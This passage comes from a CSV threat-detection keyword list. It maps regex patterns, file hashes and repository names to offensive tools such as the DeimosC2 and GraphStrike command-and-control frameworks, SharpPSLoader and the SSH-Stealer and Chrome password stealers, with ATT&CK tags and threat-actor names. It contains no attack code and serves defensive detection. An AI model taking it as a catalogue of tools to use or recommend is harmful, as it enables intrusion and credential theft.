T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63684" 
"*c18576336ad39854e79e8a06e194d2db2c0b6435eb4c13678e18950ba12d61b3*",".{0,1000}c18576336ad39854e79e8a06e194d2db2c0b6435eb4c13678e18950ba12d61b3.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63685" "*cb72621b89c8a1d9686846183e86a09d7564d085927be2f483d739aeb60fcfdd*",".{0,1000}cb72621b89c8a1d9686846183e86a09d7564d085927be2f483d739aeb60fcfdd.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63686" "*cc844f371e6ef11c23ec284542f8577b16ec132a705dda0054d1fb36cbbf9b2e*",".{0,1000}cc844f371e6ef11c23ec284542f8577b16ec132a705dda0054d1fb36cbbf9b2e.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63687" "*cf654c92792fd8964025e9dd7dc2dc0181b15c4868134ec92ad4ac166dc99050*",".{0,1000}cf654c92792fd8964025e9dd7dc2dc0181b15c4868134ec92ad4ac166dc99050.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - 
T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63688" "*collectionhashcat_shadow.txt*",".{0,1000}collectionhashcat_shadow\.txt.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63689" "*d5a3de19ef84c040a5b0058fb4fb2a036c9a8db7495763bcc7b7070f16cde967*",".{0,1000}d5a3de19ef84c040a5b0058fb4fb2a036c9a8db7495763bcc7b7070f16cde967.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63690" "*d82fdd287fa45cb4f5a51540686c3224af18884a36482258dabef042d843fe81*",".{0,1000}d82fdd287fa45cb4f5a51540686c3224af18884a36482258dabef042d843fe81.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63691" "*dad7de0b2148d5550eca6464f78d23a093048381f1583dac6254f4afd6bbbaa8*",".{0,1000}dad7de0b2148d5550eca6464f78d23a093048381f1583dac6254f4afd6bbbaa8.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - 
T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63692" "*db6746717bc58356a1fe3a5ee0e7fd35ef5f2e7a4d8f431600943d49f569e4fb*",".{0,1000}db6746717bc58356a1fe3a5ee0e7fd35ef5f2e7a4d8f431600943d49f569e4fb.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63693" "*dd580112e193bf8ef1d110c14cf80292340dc282c639f074249ca37499ab0cfb*",".{0,1000}dd580112e193bf8ef1d110c14cf80292340dc282c639f074249ca37499ab0cfb.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63694" "*deimos-server.ataplatform.io*",".{0,1000}deimos\-server\.ataplatform\.io.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63695" "*DeimosC2_darwin.zip*",".{0,1000}DeimosC2_darwin\.zip.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - 
T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63696" "*DeimosC2_linux.zip*",".{0,1000}DeimosC2_linux\.zip.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63697" "*DeimosC2_windows.zip*",".{0,1000}DeimosC2_windows\.zip.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63698" "*DeimosC2/DeimosC2*",".{0,1000}DeimosC2\/DeimosC2.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63699" "*e4e8b6290ee22f33081e29896b24fff357d2a66fcd8c1fbb8500ec0fa1da1b5c*",".{0,1000}e4e8b6290ee22f33081e29896b24fff357d2a66fcd8c1fbb8500ec0fa1da1b5c.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63700" 
"*eaf734a532b9312168cbcbbea00d08171546bc8560b7131904bd5ea77090e9d3*",".{0,1000}eaf734a532b9312168cbcbbea00d08171546bc8560b7131904bd5ea77090e9d3.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63701" "*efa7e067878424e9b5cd803423817bc2420b84e8bf3c8d5dee72eee849a893e5*",".{0,1000}efa7e067878424e9b5cd803423817bc2420b84e8bf3c8d5dee72eee849a893e5.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63702" "*hashcat_shadow.txt*",".{0,1000}hashcat_shadow\.txt.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63703" "*Println(""""C2 Server Starting*",".{0,1000}Println\(\""C2\sServer\sStarting.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#content","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63704" 
"*prototype.$c2.Agent.sendJob*",".{0,1000}prototype\.\$c2\.Agent\.sendJob.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#content","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63705" "*prototype.$c2.Listener.KillListener*",".{0,1000}prototype\.\$c2\.Listener\.KillListener.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#content","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63706" "*\TCPAgent_Win_32_ARM.exe*",".{0,1000}\\TCPAgent_Win_32_ARM\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","63707" "*.sharepoint.com*pD9-tk*",".{0,1000}\.sharepoint\.com.{0,1000}pD9\-tk.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API - default string in file names https://x.com/Octoberfest73/status/1896596953632526504","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","1","N/A","https://redsiege.com/blog/2024/01/graphstrike-developer/","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","63708" "*pD9-tK*",".{0,1000}pD9\-tK.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph 
API - default string in file names https://x.com/Octoberfest73/status/1896596953632526504","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","0","#filename #sharepoint","https://redsiege.com/blog/2024/01/graphstrike-developer/","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","63709" "*sAMAccountType=805306369*userAccountControl&2*",".{0,1000}sAMAccountType\=805306369.{0,1000}userAccountControl\&2.{0,1000}","offensive_tool_keyword","BloodHound.py","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. 
Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/FalconForceTeam/FalconFriday/blob/main/0xFF-0223-BloodHound_Usage-Win.md","1","0","#ldapquery","N/A","10","8","785","95","2025-01-17T16:00:29Z","2020-08-04T10:25:37Z","63710" "*svch0st.exe*",".{0,1000}svch0st\.exe.{0,1000}","offensive_tool_keyword","_","common masquerading technique where malware mimics the legitimate Windows system process svchost.exe by using a visually similar name","T1036.005","TA0005 ","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","63711" "*www.netexec.wiki*",".{0,1000}www\.netexec\.wiki.{0,1000}","offensive_tool_keyword","Netexec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1021 - T1087 - T1135","TA0008 - TA0007 - TA0009","N/A","N/A","Lateral Movement","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","63715" "*aircrack-ng.org*",".{0,1000}aircrack\-ng\.org.{0,1000}","offensive_tool_keyword","aircrack","Wi-Fi password cracking tool used for capturing and cracking WEP and WPA-PSK keys","T1557.002 - T1040","TA0006 - TA0009","N/A","N/A","Credential Access","N/A","1","1","N/A","N/A","8","8","N/A","N/A","N/A","N/A","63716" "*enum4linux/enum4linux*",".{0,1000}enum4linux\/enum4linux.{0,1000}","offensive_tool_keyword","enum4linux","Enum4linux is a tool for enumerating information from Windows and Samba systems. 
It attempts to offer similar functionality to enum.exe ","T1018 - T1087.002 - T1135 - T1049 - T1033","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/CiscoCXSecurity/enum4linux","1","1","#linux","N/A","10","10","1260","243","2024-10-11T14:41:57Z","2015-07-31T21:06:03Z","63723" "*crackstation.net*",".{0,1000}crackstation\.net.{0,1000}","offensive_tool_keyword","crackstation","online password hash cracking tool that uses a large precomputed lookup table (rainbow table) to recover plaintext passwords from their hash values - commonly used to crack credentials after hash extraction.","T1110.002 - T1111 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://crackstation.net/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","63726" "*assets.bishopfox.com*",".{0,1000}assets\.bishopfox\.com.{0,1000}","offensive_tool_keyword","sliver","hosts a variety of offensive security tools","T1059 - T1105 - T1027 - T1090.001 - T1071.001 - T1219 - T1053.005 - T1547.001","TA0002 - TA0005 - TA0011 - TA0003 - TA0008","N/A","N/A","C2","bishopfox.com","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A","63727" "*opt.rapid7.com*",".{0,1000}opt\.rapid7\.com.{0,1000}","offensive_tool_keyword","metasploit","opt.rapid7.com is associated with Rapid7 Metasploit Framework and other security tools used for offensive security","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","63728" 
"*pentest-tools.com*",".{0,1000}pentest\-tools\.com.{0,1000}","offensive_tool_keyword","pentest-tools","cloud-based offensive security platform offering a wide range of automated penetration testing utilities","T1595.002 - T1046 - T1083 - T1059 - T1190 - T1203","TA0007 - TA0001 - TA0002","N/A","N/A","Collection","pentest-tools.com","1","1","N/A","N/A","7","9","N/A","N/A","N/A","N/A","63729" "*swisskyrepo.github.io*",".{0,1000}swisskyrepo\.github\.io.{0,1000}","offensive_tool_keyword","pentest-tools","cloud-based offensive security platform offering a wide range of automated penetration testing utilities","T1595.002 - T1046 - T1083 - T1059 - T1190 - T1203","TA0007 - TA0001 - TA0002","N/A","N/A","Collection","N/A","1","1","N/A","N/A","7","9","N/A","N/A","N/A","N/A","63730" "*/SSH-Stealer.git*",".{0,1000}\/SSH\-Stealer\.git.{0,1000}","offensive_tool_keyword","SSH-Stealer","Smart keylogging capability to steal SSH Credentials including password & Private Key","T1056.001 - T1552.004 - T1556.004 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/DarkSpaceSecurity/SSH-Stealer","1","1","N/A","N/A","2","2","125","22","2025-03-26T04:23:00Z","2025-03-16T01:24:58Z","63736" "*DarkSpaceSecurity/SSH-Stealer*",".{0,1000}DarkSpaceSecurity\/SSH\-Stealer.{0,1000}","offensive_tool_keyword","SSH-Stealer","Smart keylogging capability to steal SSH Credentials including password & Private Key","T1056.001 - T1552.004 - T1556.004 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/DarkSpaceSecurity/SSH-Stealer","1","1","N/A","N/A","2","2","125","22","2025-03-26T04:23:00Z","2025-03-16T01:24:58Z","63737" "*\SSH-Stealer*",".{0,1000}\\SSH\-Stealer.{0,1000}","offensive_tool_keyword","SSH-Stealer","Smart keylogging capability to steal SSH Credentials including password & Private Key","T1056.001 - T1552.004 - T1556.004 - T1003","TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/DarkSpaceSecurity/SSH-Stealer","1","0","N/A","N/A","2","2","125","22","2025-03-26T04:23:00Z","2025-03-16T01:24:58Z","63738" "*sshKeylogger.*",".{0,1000}sshKeylogger\..{0,1000}","offensive_tool_keyword","SSH-Stealer","Smart keylogging capability to steal SSH Credentials including password & Private Key","T1056.001 - T1552.004 - T1556.004 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/DarkSpaceSecurity/SSH-Stealer","1","1","N/A","N/A","2","2","125","22","2025-03-26T04:23:00Z","2025-03-16T01:24:58Z","63739" "*/sshKeylogger/*",".{0,1000}\/sshKeylogger\/.{0,1000}","offensive_tool_keyword","SSH-Stealer","Smart keylogging capability to steal SSH Credentials including password & Private Key","T1056.001 - T1552.004 - T1556.004 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/DarkSpaceSecurity/SSH-Stealer","1","1","N/A","N/A","2","2","125","22","2025-03-26T04:23:00Z","2025-03-16T01:24:58Z","63740" "*aed15bd2e969003861e3389c83b8236b28d95ff77bbd0a190cd1a322cc349417*",".{0,1000}aed15bd2e969003861e3389c83b8236b28d95ff77bbd0a190cd1a322cc349417.{0,1000}","offensive_tool_keyword","SSH-Stealer","Smart keylogging capability to steal SSH Credentials including password & Private Key","T1056.001 - T1552.004 - T1556.004 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/DarkSpaceSecurity/SSH-Stealer","1","0","#filehash","N/A","2","2","125","22","2025-03-26T04:23:00Z","2025-03-16T01:24:58Z","63741" "*29766e882e55554b32f415da20cbbc3165ade2472cb0ffe6c281b0f68621bb98*",".{0,1000}29766e882e55554b32f415da20cbbc3165ade2472cb0ffe6c281b0f68621bb98.{0,1000}","offensive_tool_keyword","SSH-Stealer","Smart keylogging capability to steal SSH Credentials including password & Private Key","T1056.001 - T1552.004 - T1556.004 - T1003","TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/DarkSpaceSecurity/SSH-Stealer","1","0","#filehash","N/A","2","2","125","22","2025-03-26T04:23:00Z","2025-03-16T01:24:58Z","63742" "*86cfb31b-69ae-483e-8dd9-f8f5a82aef13*",".{0,1000}86cfb31b\-69ae\-483e\-8dd9\-f8f5a82aef13.{0,1000}","offensive_tool_keyword","SSH-Stealer","Smart keylogging capability to steal SSH Credentials including password & Private Key","T1056.001 - T1552.004 - T1556.004 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/DarkSpaceSecurity/SSH-Stealer","1","0","#GUIDproject","N/A","2","2","125","22","2025-03-26T04:23:00Z","2025-03-16T01:24:58Z","63743" "*/SharpPSLoader.git*",".{0,1000}\/SharpPSLoader\.git.{0,1000}","offensive_tool_keyword","SharpPSLoader","Simple .NET loader for loading and executing Powershell payloads","T1059.001 - T1562.001 - T1027 - T1055 - T1216","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ChoiSG/SharpPSLoader","1","1","N/A","N/A","6","1","16","5","2021-11-05T01:35:10Z","2021-10-05T04:02:29Z","63744" "*ChoiSG/SharpPSLoader*",".{0,1000}ChoiSG\/SharpPSLoader.{0,1000}","offensive_tool_keyword","SharpPSLoader","Simple .NET loader for loading and executing Powershell payloads","T1059.001 - T1562.001 - T1027 - T1055 - T1216","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ChoiSG/SharpPSLoader","1","1","N/A","N/A","6","1","16","5","2021-11-05T01:35:10Z","2021-10-05T04:02:29Z","63745" "*SharpPSLoader.exe*",".{0,1000}SharpPSLoader\.exe.{0,1000}","offensive_tool_keyword","SharpPSLoader","Simple .NET loader for loading and executing Powershell payloads","T1059.001 - T1562.001 - T1027 - T1055 - T1216","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ChoiSG/SharpPSLoader","1","1","N/A","N/A","6","1","16","5","2021-11-05T01:35:10Z","2021-10-05T04:02:29Z","63746" "*SharpPSLoaderConsole.exe*",".{0,1000}SharpPSLoaderConsole\.exe.{0,1000}","offensive_tool_keyword","SharpPSLoader","Simple .NET loader for loading and executing 
Powershell payloads","T1059.001 - T1562.001 - T1027 - T1055 - T1216","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ChoiSG/SharpPSLoader","1","1","N/A","N/A","6","1","16","5","2021-11-05T01:35:10Z","2021-10-05T04:02:29Z","63747" "*2016-2021 ?Denis Kuzmin [x-3F@outlook.com]*",".{0,1000}2016\-2021\s\?Denis\sKuzmin\s\[x\-3F\@outlook\.com\].{0,1000}","offensive_tool_keyword","SharpPSLoader","Simple .NET loader for loading and executing Powershell payloads","T1059.001 - T1562.001 - T1027 - T1055 - T1216","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ChoiSG/SharpPSLoader","1","0","#content","N/A","6","1","16","5","2021-11-05T01:35:10Z","2021-10-05T04:02:29Z","63748" "*5a5b23354e72ec44374c0cfb7d9fc6123b681c1651fa201ded7fc602ecfa05c1*",".{0,1000}5a5b23354e72ec44374c0cfb7d9fc6123b681c1651fa201ded7fc602ecfa05c1.{0,1000}","offensive_tool_keyword","SharpPSLoader","Simple .NET loader for loading and executing Powershell payloads","T1059.001 - T1562.001 - T1027 - T1055 - T1216","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ChoiSG/SharpPSLoader","1","0","#filehash","N/A","6","1","16","5","2021-11-05T01:35:10Z","2021-10-05T04:02:29Z","63749" "*4EA75F8D-F287-47E4-B698-931D90A3A85C*",".{0,1000}4EA75F8D\-F287\-47E4\-B698\-931D90A3A85C.{0,1000}","offensive_tool_keyword","SharpPSLoader","Simple .NET loader for loading and executing Powershell payloads","T1059.001 - T1562.001 - T1027 - T1055 - T1216","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ChoiSG/SharpPSLoader","1","0","#GUIDproject","N/A","6","1","16","5","2021-11-05T01:35:10Z","2021-10-05T04:02:29Z","63750" "*6D3BF3CF-1137-4609-9934-8309261F710E*",".{0,1000}6D3BF3CF\-1137\-4609\-9934\-8309261F710E.{0,1000}","offensive_tool_keyword","SharpPSLoader","Simple .NET loader for loading and executing Powershell payloads","T1059.001 - T1562.001 - T1027 - T1055 - T1216","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/ChoiSG/SharpPSLoader","1","0","#GUIDproject","N/A","6","1","16","5","2021-11-05T01:35:10Z","2021-10-05T04:02:29Z","63751" "*Invoke-SingleByteXOR*",".{0,1000}Invoke\-SingleByteXOR.{0,1000}","offensive_tool_keyword","SharpPSLoader","Simple .NET loader for loading and executing Powershell payloads","T1059.001 - T1562.001 - T1027 - T1055 - T1216","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ChoiSG/SharpPSLoader","1","1","N/A","N/A","6","1","16","5","2021-11-05T01:35:10Z","2021-10-05T04:02:29Z","63752" "*Invoke-Bloodhound*",".{0,1000}Invoke\-Bloodhound.{0,1000}","offensive_tool_keyword","SharpPSLoader","Simple .NET loader for loading and executing Powershell payloads","T1059.001 - T1562.001 - T1027 - T1055 - T1216","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ChoiSG/SharpPSLoader","1","1","N/A","N/A","6","1","16","5","2021-11-05T01:35:10Z","2021-10-05T04:02:29Z","63753" "*[+] Disabled ETW Tracing*",".{0,1000}\[\+\]\sDisabled\sETW\sTracing.{0,1000}","offensive_tool_keyword","SharpPSLoader","Simple .NET loader for loading and executing Powershell payloads","T1059.001 - T1562.001 - T1027 - T1055 - T1216","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ChoiSG/SharpPSLoader","1","0","#content","N/A","6","1","16","5","2021-11-05T01:35:10Z","2021-10-05T04:02:29Z","63754" "*[+] Disabled AMSI*",".{0,1000}\[\+\]\sDisabled\sAMSI.{0,1000}","offensive_tool_keyword","SharpPSLoader","Simple .NET loader for loading and executing Powershell payloads","T1059.001 - T1562.001 - T1027 - T1055 - T1216","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ChoiSG/SharpPSLoader","1","0","#content","N/A","6","1","16","5","2021-11-05T01:35:10Z","2021-10-05T04:02:29Z","63755" "*SharpPSLoaderConsole.SharpPSLoaderConsole*",".{0,1000}SharpPSLoaderConsole\.SharpPSLoaderConsole.{0,1000}","offensive_tool_keyword","SharpPSLoader","Simple .NET loader for loading and executing Powershell 
payloads","T1059.001 - T1562.001 - T1027 - T1055 - T1216","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ChoiSG/SharpPSLoader","1","0","#content","N/A","6","1","16","5","2021-11-05T01:35:10Z","2021-10-05T04:02:29Z","63756" "*Powersharppack -sharpup audit*",".{0,1000}Powersharppack\s\-sharpup\saudit.{0,1000}","offensive_tool_keyword","SharpPSLoader","Simple .NET loader for loading and executing Powershell payloads","T1059.001 - T1562.001 - T1027 - T1055 - T1216","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ChoiSG/SharpPSLoader","1","0","N/A","N/A","6","1","16","5","2021-11-05T01:35:10Z","2021-10-05T04:02:29Z","63757" "*/Chrome-Password-Recovery.git*",".{0,1000}\/Chrome\-Password\-Recovery\.git.{0,1000}","offensive_tool_keyword","Chrome-Password-Recovery","recover Google Chrome Logins","T1555.003 - T1005 - T1027","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/SaturnsVoid/Chrome-Password-Recovery","1","1","N/A","N/A","8","1","75","31","2021-02-05T00:36:39Z","2017-04-07T17:32:27Z","63758" "*SaturnsVoid/Chrome-Password-Recovery*",".{0,1000}SaturnsVoid\/Chrome\-Password\-Recovery.{0,1000}","offensive_tool_keyword","Chrome-Password-Recovery","recover Google Chrome Logins","T1555.003 - T1005 - T1027","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/SaturnsVoid/Chrome-Password-Recovery","1","1","N/A","N/A","8","1","75","31","2021-02-05T00:36:39Z","2017-04-07T17:32:27Z","63759" "*Chrome Password Recovery.go*",".{0,1000}Chrome\sPassword\sRecovery\.go.{0,1000}","offensive_tool_keyword","Chrome-Password-Recovery","recover Google Chrome Logins","T1555.003 - T1005 - T1027","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/SaturnsVoid/Chrome-Password-Recovery","1","1","N/A","N/A","8","1","75","31","2021-02-05T00:36:39Z","2017-04-07T17:32:27Z","63760" 
